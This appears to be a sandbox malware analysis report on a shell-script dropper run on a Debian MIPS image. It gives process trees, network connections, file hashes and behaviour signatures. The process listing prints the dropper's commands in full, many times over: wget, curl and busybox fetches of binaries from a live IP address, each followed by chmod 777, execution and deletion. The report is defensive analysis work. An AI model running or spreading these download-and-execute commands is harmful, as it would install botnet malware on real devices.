/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 02:53

Reported

2024-11-14 02:56

Platform

debian9-mipsel-20240611-en

Max time kernel

135s

Max time network

138s

Command Line

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A

Processes

/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

